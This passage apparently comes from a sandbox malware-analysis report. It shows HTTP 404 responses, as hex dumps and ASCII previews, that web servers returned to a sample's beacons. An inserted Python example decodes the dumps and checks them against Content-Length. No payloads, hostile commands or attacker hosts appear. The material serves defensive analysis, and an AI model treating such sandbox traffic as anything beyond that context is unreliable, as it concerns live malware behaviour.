6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 09:37:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:11 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:14 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:16 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:19 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:24 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:27 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:29 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:32 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
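Every beacon above was answered with a plain 404 from an ordinary web server (LiteSpeed, Apache, nginx). The report's "Data Ascii" preview cuts long bodies short, so the only complete copy of a response on the page is the "Data Raw" hex dump. The following is an added example, not part of the Joe Sandbox report: it decodes a row's hex dump back into the body, compares the byte count with the Content-Length header, and decodes the text with the charset the server declared. APACHE_404_ROW is the 09:38:24 Apache response copied from the rows above (headers and hex only); TRUNCATED_ROW is a constructed copy of the same record cut off early, to show what an incomplete capture looks like to the check. The function names are this example's own.

```python
"""Recover a response body from a report 'Data Raw' dump and check it against
Content-Length (added example, not part of the Joe Sandbox report)."""
import re

CONTENT_LENGTH_RE = re.compile(r"Content-Length:\s*(\d+)", re.IGNORECASE)
CHARSET_RE = re.compile(r"charset=([A-Za-z0-9_-]+)", re.IGNORECASE)


def parse_row(row):
    """Split a flattened report row into (header text, body bytes).

    The hex dump is whatever sits between 'Data Raw:' and 'Data Ascii:' (or the
    end of the row); bytes.fromhex() accepts the space-separated pairs as they are.
    """
    head, marker, rest = row.partition("Data Raw:")
    if not marker:
        raise ValueError("row carries no Data Raw section")
    hexdump = rest.split("Data Ascii:", 1)[0]
    return head.strip(), bytes.fromhex(hexdump)


def check_row(row):
    """Return declared vs. captured length, whether they agree, and the decoded body."""
    head, body = parse_row(row)
    length = CONTENT_LENGTH_RE.search(head)
    declared = int(length.group(1)) if length else None
    charset = CHARSET_RE.search(head)
    text = body.decode(charset.group(1) if charset else "latin-1", errors="replace")
    return {
        "declared": declared,
        "captured": len(body),
        "complete": declared is not None and declared == len(body),
        "text": text,
    }


# Header part of the 09:38:24 Apache row above, flattened exactly as the report shows it.
APACHE_HEADERS = (
    "HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:24 GMTServer: Apache"
    "X-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgrade"
    "X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196"
    "Connection: closeContent-Type: text/html; charset=iso-8859-1"
)

# The row's hex dump, split at the body's own newlines so each chunk is one HTML line.
APACHE_HEX = (
    "3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 "
    "2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a",              # DOCTYPE line
    "3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a",                                        # <html><head>
    "3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a",
    "3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a",                                     # </head><body>
    "3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a",                      # <h1>Not Found</h1>
    "3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 "
    "66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a",  # <p>...</p>
    "3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a",                                  # </body></html>
)

APACHE_404_ROW = APACHE_HEADERS + "Data Raw: " + " ".join(APACHE_HEX)
# Constructed: the same record with the dump cut after the <h1> line (126 of 196 bytes).
TRUNCATED_ROW = APACHE_HEADERS + "Data Raw: " + " ".join(APACHE_HEX[:5])

if __name__ == "__main__":
    for name, row in (("apache 404", APACHE_404_ROW), ("truncated copy", TRUNCATED_ROW)):
        result = check_row(row)
        print(f"{name}: declared={result['declared']} captured={result['captured']} "
              f"complete={result['complete']}")
    print(check_row(APACHE_404_ROW)["text"])
```

The same check_row() applies to the LiteSpeed (content-length 796) and nginx (Content-Length 548) rows, whose ASCII previews stop mid-body in the report; decoding the hex is how you read the rest, and a captured count short of the declared length tells you the sandbox cut the stream rather than the server sending less.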
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 09:39:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
